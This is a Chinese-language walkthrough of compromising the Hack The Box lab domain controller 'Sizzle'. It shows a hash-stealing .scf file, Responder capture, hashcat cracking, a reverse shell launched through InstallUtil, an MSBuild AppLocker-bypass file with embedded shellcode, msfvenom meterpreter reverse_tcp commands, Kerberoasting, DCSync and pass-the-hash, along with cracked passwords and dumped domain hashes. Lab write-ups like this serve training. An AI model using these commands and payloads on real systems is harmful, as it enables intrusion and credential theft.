namp扫描

nmap -A -T4 10.129.4.79
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 02:44 EST
Stats: 0:02:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.83% done; ETC: 02:47 (0:00:00 remaining)
Nmap scan report for 10.129.4.79
Host is up (0.25s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
21/tcp   open  ftp               Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-01-30T07:48:13+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
443/tcp  open  ssl/http          Microsoft IIS httpd 10.0
|_ssl-date: 2023-01-30T07:48:11+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
| tls-alpn:
|   h2
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-01-30T07:48:11+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-01-30T07:48:12+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
|_ssl-date: 2023-01-30T07:48:11+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-01-30T07:46:47
|_  start_date: 2023-01-30T07:43:39TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   126.89 ms 10.10.16.1
2   126.92 ms 10.129.4.79OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.10 seconds
通过nmap扫描发现是域控机器Domain: HTB.LOCAL开放了80、21端口,思路先查看80端口页面检查ftp是否可以匿名访问。

尝试FTP匿名登录

可以进行匿名登录但是没有内容使用smbclient
smbclient帮助信息
smbclient——帮助
用法:smbclient [OPTIONS] service <password>
-M，——message=HOST发送消息
-I，——IP -address=IP使用此IP连接
-E，——stderr向stderr写入消息
而不是stdout
-L，——list=HOST获取可用的共享列表
在主机上
-T，——tar=<c|x>IXFvgbNan命令行tar . t
-D，——directory=DIR从目录开始
-c，——command=STRING执行分隔的分号
命令
-b，——send-buffer=BYTES修改发送/发送缓冲区
-t，——timeout=SECONDS修改per-operation
超时
-p，——port= port连接的端口
-g，——grepable产生可查看的输出
-q，——quiet抑制帮助信息
-B，——browse使用DNS浏览SMB服务器帮助选择:
－？显示帮助信息
显示简短的使用信息常见的Samba选项:
-d，——debuglevel= debuglevel设置调试级别
——debug-stdout发送调试输出到标准
输出
-s，——configfile= configfile使用备用配置
文件
——option=name=value设置smb.conf选项from
命令行
-l，——log- Basename =LOGFILEBASE日志/调试文件的基名
——leak-report启用talloc泄漏报告
退出
——leak-report-full启用全滑石泄漏
退出报告连接选项:
-R，——name-resolve= name-resolve - order使用这些名称解析
服务只
-O，——socket-options=SOCKETOPTIONS要使用的socket选项
-m，——max-protocol=MAXPROTOCOL设置最大协议级别
-n，——netbiosname= netbiosname主netbios名称
——Netbios - SCOPE =SCOPE使用Netbios作用域
-W，——workgroup= workgroup设置工作组名称
——realm= realm设置域名证书选择:
-U，——user=[DOMAIN/]USERNAME[%PASSWORD]设置网络用户名
-N，——no-pass不要问密码
——密码=字符串                         密码
提供的密码是NT
哈希
-A，——authentication-file=FILE从文件中获取凭据
-P，——machine-pass使用存储的机器帐户
密码
——simple-bind- DN =DN用于简单绑定
——Use - Kerberos =desired|required|off使用Kerberos认证
——use-krb5-ccache=CCACHE证书缓存位置
Kerberos
使用winbind的ccache
身份验证
——client-protection=sign|encrypt|off配置使用的保护
客户端连接弃用的遗留选项:
-k，——kerberos DEPRECATED:迁移到
——使用kerberos版本选择:
-V，——version打印版本
命令:smbclient -N -L //10.129.4.79
回显:WARNING: no network interfaces foundSharename       Type      Comment---------       ----      -------ADMIN$          Disk      Remote AdminC$              Disk      Default shareCertEnroll      Disk      Active Directory Certificate Services shareDepartment Shares DiskIPC$            IPC       Remote IPCNETLOGON        Disk      Logon server shareOperations      DiskSYSVOL          Disk      Logon server shareSMB1 disabled -- no workgroup available
检查访问命令:
smbclient -N -L \\\\10.129.4.79 | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/' | while read share; do echo "======${share}======"; smbclient -N "//10.129.4.79/${share}" -c dir; echo; done
回显:WARNING: no network interfaces found======ADMIN$======WARNING: no network interfaces foundtree connect failed: NT_STATUS_ACCESS_DENIED======C$======WARNING: no network interfaces foundtree connect failed: NT_STATUS_ACCESS_DENIED======CertEnroll======WARNING: no network interfaces foundNT_STATUS_ACCESS_DENIED listing \*======Department Shares======WARNING: no network interfaces found.                                   D        0  Tue Jul  3 11:22:32 2018..                                  D        0  Tue Jul  3 11:22:32 2018Accounting                          D        0  Mon Jul  2 15:21:43 2018Audit                               D        0  Mon Jul  2 15:14:28 2018Banking                             D        0  Tue Jul  3 11:22:39 2018CEO_protected                       D        0  Mon Jul  2 15:15:01 2018Devops                              D        0  Mon Jul  2 15:19:33 2018Finance                             D        0  Mon Jul  2 15:11:57 2018HR                                  D        0  Mon Jul  2 15:16:11 2018Infosec                             D        0  Mon Jul  2 15:14:24 2018Infrastructure                      D        0  Mon Jul  2 15:13:59 2018IT                                  D        0  Mon Jul  2 15:12:04 2018Legal                               D        0  Mon Jul  2 15:12:09 2018M&A                                 D        0  Mon Jul  2 15:15:25 2018Marketing                           D        0  Mon Jul  2 15:14:43 2018R&D                                 D        0  Mon Jul  2 15:11:47 2018Sales                               D        0  Mon Jul  2 15:14:37 2018Security                            D        0  Mon Jul  2 15:21:47 2018Tax                                 D        0  Mon Jul  2 15:16:54 2018Users                               D        0  Tue Jul 10 17:39:32 2018ZZ_ARCHIVE                          D        0  Mon Jul  2 15:32:58 20187779839 blocks of size 4096. 3597277 blocks available======NETLOGON======WARNING: no network interfaces foundNT_STATUS_ACCESS_DENIED listing \*======Operations======WARNING: no network interfaces foundNT_STATUS_ACCESS_DENIED listing \*======SYSVOL======WARNING: no network interfaces foundNT_STATUS_ACCESS_DENIED listing \*发现Department Shares目录可用,放了使用方便使用CIFS协议到本地命令:mkdir temp2mount -t cifs "//10.129.4.79/Department Shares" temp2发现Users/Public目录下可以写入文件

权限获取

.scf是Windows 资源管理器用户访问该文件的目录时打开SMB连接会触发NTLM认证从而获取NET-NETLM HASH
pwn.scf文件内容如下:[Shell]Command=2IconFile=\\10.10.16.16\share\pwn.ico[Taskbar]Command=ToggleDesktop
复制到目标目录中:
cp pwn.scf /temp2/Users/Public
cp pwn.scf /temp2/ZZ_ARCHIVE
开启Responder
下载:
git clone https://github.com/lgandx/Responder.git
启动:
python3 Responder.py -I tun0
抓到的NET-NTLM v2 Hash如下:
[SMB] NTLMv2-SSP Client   : 10.129.4.79
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash     : amanda::HTB:abfb75bed96f62f2:1CFE3A78E919E4E738C635174293647A:
01010000000000008018889B6134D90188E495ABD0B9F5680000000002000800310053005200450001001E0057
0049004E002D004D00340036003200450048003600410042003500340004003400570049004E002D004D003400
3600320045004800360041004200350034002E0031005300520045002E004C004F00430041004C000300140031
005300520045002E004C004F00430041004C000500140031005300520045002E004C004F00430041004C000700
08008018889B6134D901060004000200000008003000300000000000000001000000002000008054EB7C62FABC
4F76A28F58E23A0DE80911AE7B10AAB6E6A11DA195F18AD1C30A00100000000000000000000000000000000000
0900200063006900660073002F00310030002E00310030002E00310036002E0031003600000000000000000000
000000
[+] Exiting...

使用hashcat破解获得密码

amanda.hash内容如下:
amanda::HTB:abfb75bed96f62f2:1CFE3A78E919E4E738C635174293647A:01010000000000008018889B6134D90188E495ABD0B9F5680000000002000800310053005200450001001E00570049004E002D004D00340036003200450048003600410042003500340004003400570049004E002D004D0034003600320045004800360041004200350034002E0031005300520045002E004C004F00430041004C000300140031005300520045002E004C004F00430041004C000500140031005300520045002E004C004F00430041004C00070008008018889B6134D901060004000200000008003000300000000000000001000000002000008054EB7C62FABC4F76A28F58E23A0DE80911AE7B10AAB6E6A11DA195F18AD1C30A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003600000000000000000000000000
hashcat命令:
hashcat -m 5600 amanda.hash /usr/share/wordlists/rockyou.txt --force
破解成功获得密码:Ashare1972

使用smbmap检查用户SMB共享权限

命令:smbmap -H 10.10.10.103 -u amanda -p Ashare1972
回显:
[+] IP: 10.129.4.79:445 Name: 10.129.4.79Disk                                                    PermissionsComment----                                                    ------------------ADMIN$                                                  NO ACCESS  Remote AdminC$                                                      NO ACCESS  Default shareCertEnroll                                              NO ACCESS  Active Directory Certificate Services shareDepartment Shares                                       NO ACCESSIPC$                                                    READ ONLY  Remote IPCNETLOGON                                                READ ONLY  Logon server shareOperations                                              NO ACCESSSYSVOL                                                  READ ONLY  Logon server share
使用smbclient访问CertEnroll 目录
命令:smbclient -U 'amanda%Ashare1972' //10.129.4.79/CertEnroll
回显:WARNING: no network interfaces foundTry "help" to get a list of possible commands.smb: \> dir.                                   D        0  Mon Jan 30 02:44:00 2023..                                  D        0  Mon Jan 30 02:44:00 2023HTB-SIZZLE-CA+.crl                  A      721  Mon Jan 30 02:44:00 2023HTB-SIZZLE-CA.crl                   A      909  Mon Jan 30 02:44:00 2023nsrev_HTB-SIZZLE-CA.asp             A      322  Mon Jul  2 16:36:05 2018sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt      A      871  Mon Jul  2 16:36:03 20187779839 blocks of size 4096. 3707264 blocks available发现很多证书但是没有利用点

使用BloodHound.py收集域信息

命令:python /home/kali/Desktop/AD/BloodHound.py-master/bloodhound.py -u amanda -p Ashare1972 -d htb.local -ns 10.129.3.137 -c DcOnly
因为重开了一下机器ip变了

分析发现AMANDA@HTB.LOCAL隶属于REMOTE MANAGEMENT USERS@HTB.LOCAL组尝试进行远程登录。

并且发现REMOTE MANAGEMENT USERS@HTB.LOCAL组下MRLKY@HTB.LOCAL成员对HTB.LOCAL拥有Dcsync权限,
思路是使用AMANDA账号登录目标看看是否能够拿到MRLKY成员或者域管理员的权限。下面是域管理员也是重点权限获取目标:

使用amanda账号进行登录

使用账号密码WinRM登录失败应该是需要使用证书进行登录,
发现http://10.129.3.137/certsrv可以访问certsrv是Active Directory证书服务,
使用amanda账号登录,用openssl生成密钥（key）证书签名请求（csr）
命令:openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr
cat amanda.csr
回显:-----BEGIN CERTIFICATE REQUEST-----MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJsSctxIVpvpV5RnUPAnG554gEVhkCIT2oqCHIQbWe6oIeOJYGBpka/hH6G+1yRkzFH4rSbJdmnJ2hgpFdtv1txfxV2cxQFn+9Zd0pFBgv0ZY1lUaaqe6sJ/r+F/LOP+8Wtx3b8CEVTcHYSz8SGd2GMpSN2oUK7k7nSM+huzd0J/tnlO+RSaq3qccEWqjfdkys+x+Co9gYnvZVBcLIA2a08G1nSX8l2rE19JwJza491auoU7cQfB0+lySiHaUUXtQFdZO17ibe+Lt0s3ZB3dVcXnKGc6tzCJV2qNvK/6AHI4QWhT1jO0dqVOFPXVHsXrXd/RCRDBxDkCgxNXahqPSvECAwEAAaAAMA0GCSqGSIb3DQEBCwUAA4IBAQBP0RfGSArlYiMo5DTp+b1/9eGX1zAuMkvnYq6k6CRVGJBRzmm/pmPU8owbysR9gkmhGCqvqfb3KX0ztD3Kse/FYboCHwKOv/2EgeyCGHlQ7YRmsuLncMvnynSi0K5c70XD786gAfXqkJH9kpcgHlI1Tgrltlgj3uDOTX6lVewiHEucjmcyAN4zHDIs985FjzyNq5aDoGx0SQSyiDYix3Bo369bnVgBE+8IeleerwvJcujzQro3vuWnAmReuZi6AtNpKtIvsUhHq/DET57J9Ec1Twa3s05EFkiNiAN/sb44n+6RZMczIi8fwGSGkHtFj/ZnMw12umQOC/fZkmjYqsDM-----END CERTIFICATE REQUEST-----证书下载:
http://10.129.240.148/certsrv

下载winrm shell脚本:
https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb
使用如下代码脚本:

#!/usr/bin/ruby
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new( endpoint: 'https://10.129.3.137:5986/wsman',transport: :ssl,client_cert: '/home/kali/Desktop/temp2/oepnssl/certnew.cer',client_key: '/home/kali/Desktop/temp2/oepnssl/amanda.key',:no_ssl_peer_verification => true
)command=""conn.shell(:powershell) do |shell|until command == "exit\n" dooutput = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")print(output.output.chomp)command = gets        output = shell.run(command) do |stdout, stderr|STDOUT.print stdoutSTDERR.print stderrendend    puts "Exiting with code #{output.exitcode}"
end

连接为SSL，其中指定了证书和密钥来连接目标的5986端口，连接后直接返回 powershell 命令行,
注意修改endpoint、client_cert、client_key
登陆成功:

 发现是受限制环境:$executioncontext.sessionstate.languagemodeGet-AppLockerPolicy -Effective -XML

使用PSByPassCLM绕过CLM

下载地址：https://github.com/padovah4ck/PSByPassCLM
/home/…/PSBypassCLM/obj/x64/Debug下开启http用于下载
需要注意的是x86或者debug下的不能使用会卡主
python3 -m http.server 80
下载命令:wget http://10.10.16.16/PsBypassCLM.exe -OutFile PsBypassCLM.exe

本机开启服务监听:rlwrap nc -nvlp 5555
利用 PsBypassCLM 执行命令绕过CLM完成反弹shell:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.16.16 /rport=4444 /U C:\Users\amanda\Documents\PsBypassCLM.exe发现开放88端口这可以尝试Kerberoasting攻击

Bypass-AV&&APPLocker

使用Rubeus 获取 Kerberoast
下载:https://github.com/GhostPack/Rubeus
上传上去后发现有组策略无法直接运行需要绕过

可以利用MSBuild 执行此代码因为MSBuild是白程序可以绕过APPLocker,
MSBuild可以编译 XML C# 项目文件。
参考文章:https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild
XML下载:https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
内容如下:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><!-- This inline task executes shellcode. --><!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --><!-- Save This File And Execute The Above Command --><!-- Author: Casey Smith, Twitter: @subTee --> <!-- License: BSD 3-Clause --><Target Name="Hello"><ClassExample /></Target><UsingTaskTaskName="ClassExample"TaskFactory="CodeTaskFactory"AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" ><Task><Code Type="Class" Language="cs"><![CDATA[using System;using System.Runtime.InteropServices;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class ClassExample :  Task, ITask{         private static UInt32 MEM_COMMIT = 0x1000;          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          [DllImport("kernel32")]private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          [DllImport("kernel32")]private static extern IntPtr CreateThread(            UInt32 lpThreadAttributes,UInt32 dwStackSize,UInt32 lpStartAddress,IntPtr param,UInt32 dwCreationFlags,ref UInt32 lpThreadId           );[DllImport("kernel32")]private static extern UInt32 WaitForSingleObject(           IntPtr hHandle,UInt32 dwMilliseconds);          public override bool Execute(){byte[] shellcode = new byte[195] {0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;IntPtr pinfo = IntPtr.Zero;hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);return true;} }     ]]></Code></Task></UsingTask>
</Project>

使用MSF生成ShellCode上线
命令:msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.16.10 LPORT=6666 -f csharp
编译:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\amanda\Documents\shellcode.xml

被AV杀了可以用简单的方式过AV,使用一个编码器混淆shellcode
命令:msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.16.16 LPORT=8888 -e x86/shikata_ga_nai -i 100 -f csharp
msf开启监听:

发现还是上线失败可能是因为AV问题,直接使用CS免杀上线成功

浏览文件发现system32目录下存在file.txt里边保存了凭据信息如下:

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::Domain    User  ID  Hash
------    ----  --  ----
HTB.LOCAL Guest 501 -   
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrb3n:1105:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
其实这里已经是结束了拿到域管凭据以及之前boolhound分析的MRLKY@HTB.LOCAL凭据都有了,但是在实战中
是基本不会出现这种情况的,可能因为这是HTB的靶场为了降低难度才这样做的,下面还是假设没有拿到
这些凭据进行渗透。

Kerberoasting攻击

使用CS开启隧道:

查看之前配置好的代理隧道:

需要注意的是配置proxychains或代理工具Ip并不是被攻击目标而是CS服务器Ip。

配置好代理工具后使用impacket工具包下的GetUserSPNs.py获取SPN
命令:proxychains python3 GetUserSPNs.py -request -dc-ip 10.129.240.148 HTB.LOCAL/amanda:Ashare1972
回显:

发现获取失败:

使用cs mimikatz导出凭据
先使用powershell将凭据加载到内存中
命令:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "http/sizzle"
cs下mimikatz导出需要注意的是现在beacon权限比较低要先cd到较低的权限目录中导出凭据
命令:
mimikatz kerberos::list /export
回显:

下载凭据:

使用tgsrepcrack.py工具破解
下载地址:
https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py
命令:python3 tgsrepcrack.py /home/kali/Desktop/temp/password.txt /home/kali/Desktop/temp/1-40a10000-amanda@http~sizzle-HTB.LOCAL.kirbi
破解成功密码:Football#7

Dcsync导出Hash

使用impacket-impacket_0_9_22/examples/secretsdump.py进行Dcsync操作,根据之前的分析
http/sizzle是mrlky设置的SPN使用了mrlky的hash进行加密导出TGS票据之后成功破解出密码,
boolhound之前查询到mrlky具有Dcsync权限,使用Dcsync权限滥用获取域管权限之后进行PTH攻击。
命令:python3 secretsdump.py 'mrlky:Football#7@10.129.2.190'
回显:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:ac4f44d8819e4ac2412cd5de91f311f2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3
Administrator:des-cbc-md5:ad7afb706715e964
krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699
krbtgt:des-cbc-md5:866db35eb9ec5173
amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061
amanda:des-cbc-md5:70ba677a4c1a2adf
mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0
mrlky:des-cbc-md5:02f1a4da0432f7f7
sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955
sizzler:des-cbc-md5:5d51d30e68d092d9
SIZZLE$:aes256-cts-hmac-sha1-96:70e59ac349d2ba9b9a4f69b3dac3da09c1c9dd71119d42a37ab17e50c65b4433
SIZZLE$:aes128-cts-hmac-sha1-96:00b7d18f2f0e94f6c4eb7771c18d1a8b
SIZZLE$:des-cbc-md5:ec2c32cd75808007
[*] Cleaning up...

PTH获取System权限

使用wmiexec获取system权限
命令:python3 wmiexec.py -hashes :f6b7160bfc91823792e0ac3a162c9267 administrator@10.129.2.190
成功获取system权限

总结

通过nmap扫描发现是域控机器开放了FTP端口,使用smbclient工具发现可以匿名访问FTP，
在Users/Public可以写入文件写入恶意的scf文件,攻击机器开启Responder.py监听,成功获得
了amanda账号的Net-NTLM v2 Hash使用hashcat成功破解密码,smbmap检查用户SMB共享权限
发现了很多证书但是没有太多价值,使用BloodHound分析域发现amanda账号属于REMOTE 
MANAGEMENT USERS@HTB.LOCAL远程登录组可以进行远程登录,并且发现该组下MRLKY@HTB.LOCAL
账号具有Dcsync权限,使用WinRM证书登录获得受限的powershell shell权限,使用PSByPassCLM绕过CLM
发现受组策略影响无法直接运行exe需要绕APPLocker,使用MSBuild可以编译 XML C# 项目文件绕过
APPLocker限制,成功登录到cs,使用GetUserSPNs.py查询发现MRLKY配置了SPN，使用内存加载mimikatz导出
TGS票据进行Kerberoasting攻击,使用tgsrepcrack.py工具成功破解出MRLKY账号的密码,使用secretsdump.py
进行Dcsync操作拿到域管Hash,进行PTH成功获得域控System权限。